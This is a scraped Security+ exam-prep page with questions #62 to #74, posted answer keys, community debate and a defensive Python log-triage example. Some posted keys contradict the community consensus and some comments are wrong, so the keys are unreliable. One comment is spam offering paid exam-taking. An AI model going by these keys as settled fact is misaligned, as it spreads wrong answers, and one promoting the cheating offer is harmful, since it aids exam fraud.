varun0 5 months ago
Also don't assume just because there's a db admin there'd be a database. DB or web application interface (XSS) is not a requirement for a
web server, don't assume there is one.
upvoted 1 times

Question #62 Topic 1

A junior security analyst is conducting an analysis after passwords were changed on multiple accounts without users' interaction. The SIEM have
multiple login entries with the following text: suspicious event - user: scheduledtasks successfully authenticate on AD on abnormal time
suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py suspicious event - user:
scheduledtasks failed to execute c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh suspicious event - user: scheduledtasks
successfully executed c:\weekly_checkups\amazing-3rdparty-domain-assessment.py
Which of the following is the MOST likely attack conducted on the environment?

A. Malicious script

B. Privilege escalation

C. Domain hijacking

D. DNS poisoning

Correct Answer: A

Community vote distribution: A (73%) B (25%)
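The four SIEM entries quoted in this question, triaged with the baseline-deviation logic that the Question #60 discussion (tek7ila's quoted definition, FMMIR's description of UBA) turns on. This is an added example written for this page, not ExamTopics content or any commenter's code; the ISO timestamps prepended to the entries, the historical logon times used as the baseline, and the approved-script allowlist are all constructed assumptions.

```python
"""Baseline-deviation triage of the SIEM entries in Question #62.

Added example; the four 'suspicious event' strings come from the question,
everything else (timestamps, baseline history, allowlist) is constructed.
"""
import re
from datetime import datetime

# The four SIEM entries quoted in the question, with constructed ISO timestamps
# prepended so they can be checked against a time baseline.
SIEM_LINES = [
    r"2023-01-22T03:12:44Z suspicious event - user: scheduledtasks successfully authenticate on AD on abnormal time",
    r"2023-01-22T03:12:50Z suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py",
    r"2023-01-22T03:13:02Z suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh",
    r"2023-01-22T03:14:30Z suspicious event - user: scheduledtasks successfully executed c:\weekly_checkups\amazing-3rdparty-domain-assessment.py",
]

# Constructed history: the service account has only ever authenticated around 01:00 UTC.
HISTORICAL_LOGONS = ["2023-01-01T01:00:03Z", "2023-01-08T01:00:05Z", "2023-01-15T01:00:02Z"]

# Constructed allowlist: the one script the weekly checkup task is supposed to run.
APPROVED_SCRIPTS = {r"c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh".lower()}

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) suspicious event - user: (?P<user>\S+) "
    r"(?P<outcome>successfully|failed to) (?P<verb>authenticate|executed?)"
    r"(?: on AD on abnormal time| (?P<path>\S+))?$"
)
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_event(line):
    """Split one SIEM line into its fields; returns None if the line does not fit the format."""
    m = EVENT_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["time"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["success"] = ev["outcome"] == "successfully"
    # Windows paths are case-insensitive, so compare them in one case.
    ev["path"] = ev["path"].lower() if ev["path"] else None
    return ev


def learn_baseline_hours(timestamps):
    """Baseline = the set of UTC hours at which the account has authenticated before."""
    return {datetime.strptime(t, TS_FMT).hour for t in timestamps}


def triage(lines, baseline_hours, approved):
    """Run three checks over the events; returns a list of (timestamp, finding) tuples.

    1. successful logon at an hour never seen in the baseline
    2. execution (or attempted execution) of a script outside the allowlist
    3. a script that fails and then succeeds for the same account
    """
    findings = []
    last_failed = {}  # (user, path) -> time of the most recent failed execution
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            findings.append(("?", f"unparsed line: {line[:60]}"))
            continue
        user, t = ev["user"], ev["time"]
        if ev["verb"] == "authenticate":
            if ev["success"] and t.hour not in baseline_hours:
                findings.append((ev["ts"], f"{user}: logon at {t:%H:%M} UTC is outside baseline hours {sorted(baseline_hours)}"))
            continue
        path = ev["path"]
        if path is None:
            continue
        if path not in approved:
            state = "executed" if ev["success"] else "attempted"
            findings.append((ev["ts"], f"{user}: unapproved script {state}: {path}"))
        key = (user, path)
        if not ev["success"]:
            last_failed[key] = t
        elif key in last_failed:
            gap = (t - last_failed[key]).total_seconds()
            findings.append((ev["ts"], f"{user}: {path} succeeded {gap:.0f}s after a failed attempt"))
    return findings


if __name__ == "__main__":
    for ts, finding in triage(SIEM_LINES, learn_baseline_hours(HISTORICAL_LOGONS), APPROVED_SCRIPTS):
        print(ts, finding)
```

On the question's four entries this yields four findings: the off-hours logon, the attempted and then successful run of the script that is not on the allowlist, and the fail-then-succeed pattern for that same script.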

CertAddict69 (Highly Voted) 4 months, 2 weeks ago
Selected Answer: A
This is obviously A, malicious script. Look at the name of the script that is running:
"amazing-3rdparty-domain-assessment.py"

I'm sure they used the word amazing in the file name so that the script appears as a malicious script that is disguised as a 3rd party domain
assessment script.
upvoted 17 times

hazeleyes (Highly Voted) 4 months, 3 weeks ago
Selected Answer: B
B. The hacker was able to gain control of a service account "scheduledtask", then attempted to execute a command which failed, presumably
due to admin privilege requirements. The hacker then used a .sh script to execute a privilege escalation to obtain admin privilege, which is why
the 3rd input (which is identical to the first) is successful.
upvoted 6 times

Jossie_C 3 months ago
Dude? It's malicious script.
upvoted 3 times

TR3Y 4 months, 2 weeks ago
I concur
upvoted 1 times

FiendForce138 4 months, 1 week ago
The question is not asking how the attacker gained access to AD but instead what they are doing once they got there. They obviously
blocked legitimate .sh scripts and ran their own malicious scripts. You guys are overthinking it.
upvoted 5 times

scarceanimal (Most Recent) 1 day, 4 hours ago
Selected Answer: A
"amazing-3rdparty-domain-assessment.py" lol they put amazing hilarious
upvoted 1 times

hsdj 4 days, 4 hours ago
passwords were changed on multiple accounts without users' interaction - looks like privileged account activity to me
upvoted 1 times

hsdj 4 days, 4 hours ago
Option "malicious script" is not a TYPE of attack! So my answer is privilege escalation, B.
upvoted 1 times

asum 2 weeks, 3 days ago
Selected Answer: B
It is talking about attack. So B
upvoted 2 times

farisAl 3 weeks, 5 days ago
Selected Answer: A
execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py
The .py at the end gave it away it's a malicious script
upvoted 2 times

LaoX 1 month ago
Selected Answer: A
Definitely A: Malicious Scripts. Look at these: 1. weekly_checkups\secureyourAD-3rdparty-compliance.sh 2. scheduledtasks, and 3.
amazing-3rdparty-domain-assessment. All those are definitely malicious names that result in password changes.
upvoted 1 times

rhocale 1 month, 3 weeks ago
Agreed, this is a malicious script; you can tell this because of the .py at the end, meaning Python script.
upvoted 1 times

tek7ila 2 months ago
Selected Answer: A
I also agree that's an A
upvoted 2 times

okay123 2 months, 3 weeks ago
Selected Answer: A
It's A, Malicious Script.
upvoted 2 times

Jossie_C 3 months ago
It's not privilege escalation. Scheduledtasks is not something that a user controls.
upvoted 1 times

TryingToLearn19 3 months, 1 week ago
Selected Answer: A
I believe it's a Malicious Script; a .py is a Python file, so it seems like a script was being run.
upvoted 3 times

MarciaL 3 months, 2 weeks ago
Selected Answer: D
I am thinking D.
upvoted 1 times

comeragh 4 months, 1 week ago
Would 2 references to this within the question "scheduledtasks failed to execute" rule out malicious script?
upvoted 1 times

IT_kiddie 4 months, 1 week ago
Selected Answer: A
".py" in the question means Python, so I think it's most likely a script
upvoted 4 times

k9_462 4 months, 3 weeks ago
Selected Answer: B
Seems like B to me. The attacker was able to gain access, then had a few failed attempts, then eventually was able to escalate his privileges. Not
100% sure on this one though.
upvoted 3 times

FT1 5 months ago
A-Malicious scripts are fragments of code that have been modified by threat actors for nefarious purposes. Cyber threat actors hide them in
legitimate websites, third-party scripts, and other places to compromise the security of client-side web applications and webpages
upvoted 4 times

Question #63 Topic 1

A customer service representative reported an unusual text message that was sent to the help desk. The message contained an unrecognized
invoice number with a large balance due and a link to click for more details. Which of the following BEST describes this technique?

A. Vishing

B. Whaling

C. Phishing

D. Smishing

Correct Answer: D

Community vote distribution: D (100%)

comeragh (Highly Voted) 5 months ago
Selected Answer: D
Agree with D being correct here
upvoted 8 times

varun0 5 months ago
Agreed
upvoted 2 times

DALLASCOWBOYS (Most Recent) 5 days, 23 hours ago
D. Smishing is phishing via text
upvoted 1 times

xxxdolorxxx 2 weeks, 2 days ago
Smishing = Text Message
upvoted 1 times

Orean 3 months, 1 week ago
Selected Answer: D
Pretty straightforward. Smishing, a portmanteau of SMS and phishing, is a specific type of phishing done via text messaging, and it's commonly
used to orchestrate invoice scams or otherwise harvest credentials.
upvoted 2 times

Question #64 Topic 1

Which of the following actions would be recommended to improve an incident response process?

A. Train the team to identify the difference between events and incidents.

B. Modify access so the IT team has full access to the compromised assets.

C. Contact the authorities if a cybercrime is suspected.

D. Restrict communication surrounding the response to the IT team.

Correct Answer: A

Community vote distribution: A (79%) B (21%)

hazeleyes (Highly Voted) 4 months, 3 weeks ago
Selected Answer: A
A is correct. This training can help the CSIRT know whether to trigger IR mechanisms and reduce instances of false alerts. With B, I don't really see
why giving the IT team access can be beneficial, as this could very likely violate the least privilege principle.
upvoted 6 times

DALLASCOWBOYS (Most Recent) 5 days, 23 hours ago
A. Training the team to differentiate between incidents and events.
upvoted 1 times

KingDrew 3 weeks, 3 days ago
Selected Answer: A
A is correct since it helps create more response efficiency.
upvoted 1 times

okay123 2 months, 3 weeks ago
Selected Answer: A
Training the team makes sense, I don't see how giving the whole IT team full access to zombie computers is going to do anything...
upvoted 2 times

Gravoc 4 months, 2 weeks ago
An event is defined as an attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or
information stored on such Information System.

An incident is defined as a breach of a system's security policy in order to affect its integrity or availability and/or the unauthorised access or
attempted access to a system or systems
upvoted 2 times

carpathia 4 months, 3 weeks ago
Selected Answer: A
The Preparation (initial) phase involves ensuring that the correct data events are being logged, that the reporting of potential incidents is happening, and personnel
training. Nothing in B, C and D is referring to that.
upvoted 2 times

j0n45 4 months, 3 weeks ago
Of course the answer is "A", logically speaking, if the "CSIRT" and not "IT" team is trained to differentiate between events and incidents, that
would drastically improve their IR process. 🐱‍🚀 🐱‍💻
upvoted 3 times

j0n45 4 months, 3 weeks ago
Also to add:
Security Incidents Are Events That Produce Consequences
It’s when an event results in a data breach or privacy breach that the event is then deemed a security incident.

For example, a delay in patching a security weakness in vital company software would be an event. It would only be deemed an incident after
your security monitoring team confirmed a resulting data breach by hackers who capitalized on the weakness.
upvoted 2 times

MarceloFontes1979 4 months, 4 weeks ago
A - I believe is the best choice.
upvoted 2 times

Liftedkris 5 months ago
Selected Answer: A
I'm leaning towards training so A for me
upvoted 4 times
varun0 5 months ago
Selected Answer: B
B according to me
upvoted 4 times

cymm 3 months ago
Any change after a compromise may not be possible. The only way to guarantee full access would be to modify beforehand. Then you would violate the
principle of least privilege.
upvoted 1 times

BM9904 4 months, 3 weeks ago
I agree this step comes before training your team in the process
upvoted 1 times

Question #65 Topic 1

A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack at Layer 7? (Choose two.)

A. HIDS

B. NIPS

C. HSM

D. WAF

E. NAC

F. NIDS

Correct Answer: BD

Community vote distribution: BD (75%) DE (15%) 10%

varun0 (Highly Voted) 5 months ago
Selected Answer: BD
B & D seem correct; it has to BLOCK the traffic, remember.
upvoted 9 times

DALLASCOWBOYS (Most Recent) 5 days, 23 hours ago
B & D. Web Application Firewall is at the Application Layer, and NIPS is a prevention system.
upvoted 1 times

Sandon 2 weeks, 1 day ago
Selected Answer: DE
ChatGPT says it's WAF and NAC.
upvoted 2 times

asum 2 weeks, 3 days ago
Selected Answer: BD
The IPS sensor analyzes at Layer 2 to Layer 7 the payload of the packets for more sophisticated embedded attacks that might include malicious
data.
upvoted 1 times

P0wned 1 month ago
Selected Answer: DE
D. WAF (Web Application Firewall) and E. NAC (Network Access Control) can block attacks at Layer 7.

A HIDS (Host-based Intrusion Detection System) is a security system that monitors and analyzes the logs and events on a single host for signs of
potential attacks or malicious activity. It operates at the host level, rather than at the network level, and therefore cannot block attacks at Layer 7.

A NIPS (Network Intrusion Prevention System) is a security system that analyzes network traffic in real-time to identify and prevent potential
attacks or malicious activity. It operates at the network level, rather than at the host level, and therefore cannot block attacks at Layer 7.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: BD
Answer: (B) NIPS and (D) WAF

A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the
Internet. It typically protects web applications from attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection,
among others. A WAF is a protocol layer 7 defense (in the OSI model).

A network intrusion protection system (NIPS) is an umbrella term for a combination of hardware and software systems that protect computer
networks from unauthorized access and malicious activity. NIPS consists of NIDS and IPS. WAF is a firewall. NIPS can operate up to layer 7 by
passing or allowing traffic
upvoted 3 times

Jossie_C 3 months ago
NIPS consists of NIDS and IPS. WAF is a firewall.
upvoted 2 times


jgp 5 months ago
Selected Answer: BD
B & D.
> An inline NIPS is “in line” with traffic, acting as a Layer 3–7 firewall by passing or allowing traffic
upvoted 2 times

Wiggie 5 months ago
Selected Answer: AD
A&D
Layer 7 = Host Intrusion Detection System and Web Application Firewall
upvoted 2 times

CapJackSparrow 3 months, 2 weeks ago
I generally look for what you would go for and pick the opposite...
upvoted 8 times

Gino_Slim 3 months, 2 weeks ago
That is actually hilarious
upvoted 1 times

ramesh2022 4 months, 2 weeks ago
HIDS only detects and alerts you; it can't block or be programmed to block. HIPS or NIPS can.
upvoted 2 times

redsidemanc2 4 months, 4 weeks ago
BLOCK. IDS only detects. It's B and D.
upvoted 1 times

zzzfox 4 months, 4 weeks ago
The question is asking to block potential attacks. IDS doesn't block the traffic.
upvoted 1 times


Question #66 Topic 1

A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The
manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager's
concerns?

A. Implement a full system upgrade.

B. Perform a physical-to-virtual migration.

C. Install uninterruptible power supplies.

D. Purchase cybersecurity insurance.

Correct Answer: B

Community vote distribution


B (100%)

xxxdolorxxx 1 week, 6 days ago
Selected Answer: B
I go for B.
A. Implement a full system upgrade. (Not cost effective)
B. Perform a physical-to-virtual migration. (Cloud would be much more redundant against physical hardware breaking)
C. Install uninterruptible power supplies. (Would only help really if an external power failure, would do nothing if say a hard drive fails)
D. Purchase cybersecurity insurance. (Hardware will still fail)
upvoted 2 times

KingDrew 3 weeks, 2 days ago
Selected Answer: B
Answer is B
Cloud is far more secure and reliable than a stand-alone computer, and there are many applications out right now for little to no cost that can
store data and software.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: B
Answer: Perform a physical-to-virtual migration.

A physical-to-virtual migration (P2V) is the migration of physical machines to virtual machines. Converting the PC to a VM temporarily will allow
the PC to continue its operations on a different host. The other options would require that the PC be turned off, so the organization would not have
access to its function.
upvoted 2 times

carpathia 2 months, 3 weeks ago
Selected Answer: B
It must be B. Purchasing insurance is Transference, not Mitigation.
upvoted 1 times

zzzfox 4 months, 4 weeks ago
Selected Answer: B
B - Migrate Physical Server to Cloud(Virtual)
upvoted 2 times

comeragh 5 months ago
Read my full comment, Ribeiro. I didn't say it was D; I was referring to the point that you might be in an exam and trying to narrow it down...
upvoted 4 times

comeragh 5 months ago
Selected Answer: B
To narrow it down for me it would be either B or D. Going with B as the question mentions "without incurring large costs"
upvoted 4 times

Ribeiro19 5 months ago
Man, wake up, D is for cybersecurity, not for hardware failure. Option B is the only answer.
upvoted 5 times

varun0 5 months ago
Selected Answer: B
B seems right; "without incurring large costs" means a full system upgrade is out of the question.
upvoted 1 times


Question #67 Topic 1

An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics
team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is
known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to
prevent reinfection from the infection vector?

A. Prevent connections over TFTP from the internal network.

B. Create a firewall rule that blocks a 22 from the internet to the server.

C. Disable file sharing over port 445 to the server.

D. Block port 3389 inbound from untrusted networks.

Correct Answer: C

Community vote distribution


D (95%) 5%

stoneface (Highly Voted) 5 months, 1 week ago
Selected Answer: D
The SMB protocol (in all its versions) doesn't provide functionality to execute files on remote systems. Its main objective is to support the
sharing of file and print resources between machines.

The only feasible option left is logging in through RDP and manually executing the file.

Correct me if I am wrong
upvoted 31 times

J_Ark1 3 months ago
yeahh :)
upvoted 1 times

darkgypsy 3 months ago
You rock !
upvoted 1 times

banditring 4 months, 3 weeks ago
you the best stoneface :)
upvoted 7 times

varun0 5 months ago
I agree
upvoted 2 times

rodwave (Highly Voted) 2 months, 3 weeks ago
Selected Answer: D
Answer: Block port 3389 inbound from untrusted networks.

3389 is the default port for RDP connections. RDP is the protocol used to connect to Windows desktops/servers remotely. In the scenario, the
malware family is known to be distributed through manually logging on to servers, and RDP would require a manual login to access the machine
and be able to easily run scripts on the server, especially through a GUI.
upvoted 5 times

ronniehaang (Most Recent) 4 days, 17 hours ago
Selected Answer: D
D. Block port 3389 inbound from untrusted networks.

Blocking port 3389, which is used for Remote Desktop Protocol (RDP), would prevent remote access to the server from untrusted networks,
making it less likely for attackers to manually log on to the server and run the malicious code. This would be the best action to prevent reinfection
from the initial infection vector.
upvoted 1 times

Jimbobilly 1 month, 2 weeks ago
Selected Answer: C
Curveball, the person was physically in front of the server and logged in.
upvoted 1 times

GMuney 2 months, 2 weeks ago
Selected Answer: C
Can't it be C? If we're looking to prevent reinfection then wouldn't we want to block file sharing so that the malicious code wouldn't end up on
the server in the first place?
upvoted 1 times

babyzilla 3 months ago
Selected Answer: D
D makes the most sense as the best solution to prevent manually logging into a system would be to block RDP. SSH is for Linux. RDP is for
Windows. C would probably be the next step.
upvoted 2 times

yasuke 3 months, 1 week ago
it had to be a windows server :D
block rdp
upvoted 3 times

rindrasakti 3 months, 3 weeks ago
Selected Answer: D
Read carefully: "to be distributed by manually logging on to servers and running the malicious code" means using RDP. The simple way to
prevent it is by blocking the RDP port.
upvoted 1 times

Jakalan7 4 months, 2 weeks ago
Selected Answer: D
The answer is clearly D. The question states "The malware family that was detected is known to be distributed by manually logging on to servers
and running the malicious code." By blocking inbound connections on port 3389 (RDP), they would be preventing reinfection.
upvoted 1 times

Michelle2022 4 months, 4 weeks ago
I think answer C is correct.
"Do I need port 445 open?
We also recommend blocking port 445 on internal firewalls to segment your network – this will prevent internal spreading of the ransomware.
Note that blocking TCP 445 will prevent file and printer sharing – if this is required for business, you may need to leave the port open on some
internal firewalls. "
upvoted 2 times

yorkwu 5 months ago
Selected Answer: D
Agree with D
upvoted 1 times


Question #68 Topic 1

Which of the following uses SAML for authentication?

A. TOTP

B. Federation

C. Kerberos

D. HOTP

Correct Answer: B

Community vote distribution


B (100%)

KetReeb (Highly Voted) 5 months ago
Answer: B: Federation, or identity federation, defines policies, protocols, and practices to manage identities across systems and organizations.
Federation’s ultimate goal is to allow users to seamlessly access data or systems across domains. Federation is enabled through the use of
industry standards such as Security Assertion Markup Language (SAML)
upvoted 20 times

varun0 5 months ago
I agree
upvoted 1 times

KingDrew (Most Recent) 3 weeks, 2 days ago
Selected Answer: B
Federation is correct
upvoted 1 times

Knowledge33 3 months, 1 week ago
Selected Answer: B
Federation, or identity federation, defines policies, protocols, and practices to manage identities across systems and organizations. Federation’s
ultimate goal is to allow users to seamlessly access data or systems across domains. Federation is enabled through the use of industry
standards such as Security Assertion Markup Language (SAML).
upvoted 3 times

db97 4 months, 1 week ago
B - Federation
upvoted 1 times


Question #69 Topic 1

The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of
incident has become more common in recent weeks and is consuming large amounts of the analysts' time due to manual tasks being performed.
Which of the following solutions should the SOC consider to BEST improve its response time?

A. Configure a NIDS appliance using a Switched Port Analyzer.

B. Collect OSINT and catalog the artifacts in a central repository.

C. Implement a SOAR with customizable playbooks.

D. Install a SIEM with community-driven threat intelligence.

Correct Answer: C

Community vote distribution


C (100%)

varun0 (Highly Voted) 5 months ago
Selected Answer: C
SOAR allows for automation of IR
upvoted 7 times

KingDrew (Most Recent) 3 weeks, 2 days ago
Selected Answer: C
SOAR is automated, and includes security orchestration and response to help resolve security issues more efficiently and timely.
upvoted 1 times

Jossie_C 3 months ago
Selected Answer: C
Sounds like football but ok
upvoted 2 times

Tjank 4 months, 1 week ago
Selected Answer: C
SOAR (Security Orchestration, Automation, and Response)
Can use either a playbook or a runbook. It assists in collecting threat-related data from a range of sources and automates responses to low-level
threats (frees up some of the CSIRT's time).
upvoted 3 times


Question #70 Topic 1

Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible
for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is
the BEST solution to adopt?

A. PKI

B. Blockchain

C. SAML

D. OAuth

Correct Answer: A

Community vote distribution


A (74%) B (26%)

ronniehaang 4 days, 17 hours ago
Selected Answer: A
A. PKI (Public Key Infrastructure) is the best solution to adopt as it provides the means to securely issue, manage, and revoke digital certificates
used to verify the identity of users and systems. PKI is commonly used to secure transactions and provide secure communication between
entities, making it a suitable solution for the described scenario.
upvoted 1 times

Blake89 2 months, 3 weeks ago
PKI (Public Key Infrastructure)
• Combining asymmetric cryptography with symmetric cryptography along with the hashing and digital certificates, giving us hybrid
cryptography.

Straight from the CompTIA study guide
upvoted 3 times

BigV 3 months, 3 weeks ago
The question mentions one trusted company, "centralized", it can not be Blockchain which is a "de-centralized" technology.
upvoted 4 times

elkol 4 months, 1 week ago
Selected Answer: A
Answer is PKI. PKI involves one trusted third party or middleman, which is the company. Blockchain is a decentralized or distributed system. I
think some people lean towards Blockchain as the answer due to "validate transactions" being mentioned, which I understand, but I will go with "A -
PKI"
upvoted 4 times

hazeleyes 4 months, 3 weeks ago
Selected Answer: A
PKI. "register and issue artifacts used to sign, encrypt, and decrypt transaction files" - for PKI this artifact is a digital certificate. What artifact
does the blockchain "register" and "issue" that does this?
upvoted 2 times

KetReeb 5 months ago
Selected Answer: A
I have to go with A: PKI.
Ref the following: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786417(v=ws.11)
upvoted 3 times

varun0 5 months ago
Selected Answer: A
PKI seems like it
upvoted 4 times

Wiggie 5 months ago
Selected Answer: B
Blockchain
upvoted 3 times

CapJackSparrow 3 months, 2 weeks ago
I was going to go with blockchain, then I saw YOU went with blockchain... so now I'm pretty sure it's not blockchain.
upvoted 8 times
Jossie_C 3 months ago
Blockchain is decentralized. Incorrect.
upvoted 1 times

varun0 5 months ago
Selected Answer: B
Blockchain is the best for transactions
upvoted 2 times

varun0 5 months ago
Disregard this, I'm going with PKI after much consideration
upvoted 6 times


Question #71 Topic 1

A security analyst has been asked by the Chief Information Security Officer to:
✑ develop a secure method of providing centralized management of infrastructure
✑ reduce the need to constantly replace aging end user machines
✑ provide a consistent user desktop experience
Which of the following BEST meets these requirements?

A. BYOD

B. Mobile device management

C. VDI

D. Containerization

Correct Answer: C

Community vote distribution


C (100%)

varun0 (Highly Voted) 5 months ago
Selected Answer: C
VDI seems to be it
upvoted 6 times

applepieboy (Most Recent) 1 week, 2 days ago
Selected Answer: C
Pretty clearly VDI. 2 big giveaways
1. VDI makes centralized management easier
2. Since you push the same desktop it is the only thing that provides a consistent desktop experience.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: C
Answer: VDI

Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts
desktop environments on a centralized server and deploys them to end-users on request.
upvoted 2 times

Jossie_C 3 months ago
Virtual desktops so that it can be combined with BYOD to save money.
upvoted 2 times

Katyaz 3 months, 3 weeks ago
VDI appears to be correct
upvoted 1 times

comeragh 5 months ago
Selected Answer: C
Agree with C VDI - "consistent user desktop experience"
upvoted 3 times

stoneface 5 months ago
plus, no need to replace aging end user machines
upvoted 4 times


Question #72 Topic 1

Which of the following terms describes a broad range of information that is sensitive to a specific organization?

A. Public

B. Top secret

C. Proprietary

D. Open-source

Correct Answer: C

Community vote distribution


C (100%)

IQ30 (Highly Voted) 5 months ago
Professor Messer notes:
• Proprietary
– Data that is the property of an organization
– May also include trade secrets
– Often data unique to an organization
upvoted 6 times

DALLASCOWBOYS (Most Recent) 5 days, 22 hours ago
C. Proprietary is specific to 1 organization
upvoted 1 times

applepieboy 1 week, 2 days ago
Selected Answer: C
Proprietary would definitely be the answer on an exam, but top secret is still accurate.
upvoted 1 times

Nirmalabhi 2 months ago
Selected Answer: C
No-brainer. Proprietary should be the answer.
upvoted 2 times

[Removed] 2 months, 3 weeks ago
hello everyone, are you interested in taking any exam certification exam? Contact me now for remote support. Success guaranteed in just a
single attempt. wa.me/12694315721
upvoted 2 times

viksap 2 months, 2 weeks ago
what's the proposal?
upvoted 1 times

eli_2000 2 months, 3 weeks ago
I need that
upvoted 2 times

rodwave 2 months, 3 weeks ago
Selected Answer: C
Answer: Proprietary

Proprietary information, also known as a trade secret, is information a company wishes to keep confidential
upvoted 1 times

RonWonkers 4 months, 1 week ago
Selected Answer: C
I agree with C
upvoted 1 times


Question #73 Topic 1

A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO
believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls. Which of the
following should be implemented to BEST address the CSO's concerns? (Choose two.)

A. A WAF

B. A CASB

C. An NG-SWG

D. Segmentation

E. Encryption

F. Containerization

Correct Answer: CD

Community vote distribution


BC (97%)

stoneface (Highly Voted) 5 months, 1 week ago
Selected Answer: BC
NG-SWG -> The NG SWG is designed to address the key cloud and web security use cases, encompassing granular policy controls, web filtering,
threat protection, and data protection spanning managed and unmanaged apps, cloud services, and web traffic.

CASB The CASB serves as a policy enforcement center, consolidating multiple types of security policy enforcement and applying them to
everything your business utilizes in the cloud—regardless of what sort of device is attempting to access it, including unmanaged smartphones,
IoT devices, or personal laptops.
upvoted 25 times

carpathia (Highly Voted) 2 months, 2 weeks ago
Selected Answer: BC
CASB and NGSWG (pg 164 in D Gibson's book on SY0-601).
upvoted 5 times

scarceanimal (Most Recent) 15 hours, 32 minutes ago
Selected Answer: BC
both cloud controls that address the dude's concerns. :)
upvoted 1 times

mhmtn 3 days, 3 hours ago
I think C and D. I have been inspired by the divide-and-manage policy that was a British tactic at the head of the century :)
upvoted 1 times

okay123 2 months, 3 weeks ago
Selected Answer: BC
Correct would be B & C
upvoted 1 times

carpathia 2 months, 3 weeks ago
Selected Answer: BC
https://www.netskope.com/blog/where-casb-and-swg-are-headed
It looks like segmentation in the cloud is not that efficient or you'll still need to secure the segments with, well, SWGs probably.
upvoted 1 times

BigV 3 months ago
How Does Cloud Network Segmentation Support a Defense In-Depth Strategy?
Cloud network segmentation, at its heart, is a Defense-in-Depth cybersecurity approach. It can effectively reduce the risk of data breaches as it
wraps layer upon layer of security around IT systems and data. This multi-layered cybersecurity strategy prevents malicious malware from
spreading across every network in a business organization. It can also efficiently block hackers from quickly accessing networks and eliminate
the possibility of sensitive data from being exposed.
upvoted 1 times

Jossie_C 3 months ago
Segmentation isn't enough because you still need to detect threats, begging the question.
upvoted 1 times


03allen 3 months, 4 weeks ago
why not a cloud-based WAF?
upvoted 2 times

_bishalk__ 4 months, 1 week ago
C and D for sure. Cloud Access Security broker is a security policy enforcement point that is placed between Cloud service provider and service
consumer. Creating segments will help to examine the traffic between segments providing extra security.
upvoted 1 times

carpathia 4 months, 3 weeks ago
Selected Answer: CD
CASB is more like a policy enforcer, but it might as well be. Looks like SWG and definitely cloud segmentation (it does exactly that, inspection of
packets etc. - pg 403 of some book I am studying from, 9781260464009).
upvoted 1 times

carpathia 4 months, 3 weeks ago
I have just found this: "Many organizations are implementing Cloud Access Security Broker (CASB) technology to protect critical corporate
data stored within cloud apps. Amongst many other preventative and detective controls, a key feature of CASBs is the ability to encrypt data
stored within cloud apps." It could as well be CASB and segmentation.
upvoted 1 times

Wiggie 5 months ago
Selected Answer: BC
B & C are correct
upvoted 4 times


Question #74 Topic 1

An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users'
corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment
models is being utilized?

A. MDM and application management

B. BYOD and containers

C. COPE and VDI

D. CYOD and VMs

Correct Answer: B

Community vote distribution


C (90%) 6%

stoneface (Highly Voted) 5 months, 1 week ago
Selected Answer: C
Bring your own device (BYOD)—the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the
company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of
oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers.
Corporate owned, business only (COBO)—the device is the property of the company and may only be used for company business.
Corporate owned, personally-enabled (COPE)—the device is chosen and supplied by the company and remains its property. The employee may
use it to access personal email and social media accounts and for personal web browsing (subject to whatever acceptable use policies are in
force).
Choose your own device (CYOD)—much the same as COPE but the employee is given a choice of device from a list.
upvoted 29 times

applepieboy (Most Recent) 1 week, 2 days ago
Selected Answer: C
There is no way to know whether or not VDI is involved in this situation, but the answer is clearly the one with COPE (corporate owned, personally
enabled). The workers don't own the device, but it is allowed to be used for personal business. By definition COPE.
upvoted 2 times

byfener 1 month, 3 weeks ago
Selected Answer: C
It has to be C; the question says "An organization is planning to roll out a new mobile device policy and issue each employee a new laptop."
upvoted 1 times

carpathia 4 months, 3 weeks ago
Selected Answer: C
VDI is installed on laptops, no probs (search best laptops for VDI on Google). I don't think anyone uses Terminals anymore. COPE does allow
users to use the device for personal activities.
upvoted 3 times

Swarupam 4 months, 4 weeks ago
Selected Answer: C
The answer is hidden in the question! The company is providing the laptops, so it's COPE.
upvoted 4 times

remtech 5 days, 21 hours ago
says - issue each employee COPE
upvoted 1 times

cozzmo 4 months, 4 weeks ago
NOT VDI: issue each employee a new laptop. (VDI is a virtual workspace on a server. so you don't get a laptop).
NOT BYOD: issue each employee a new laptop.
NONE of these work!
upvoted 1 times

